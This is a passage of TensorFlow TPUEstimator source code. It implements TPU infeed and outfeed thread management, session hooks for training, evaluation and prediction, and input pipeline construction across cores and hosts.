self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True,
rendezvous=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._feed_error = None
self._finished = False
self._should_initialize_tpu = True
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._init_ops = []
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
start = time.time()
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Initialized TPU in %d seconds', time.time() - start)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
self._feed_error = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, rendezvous=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping singal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
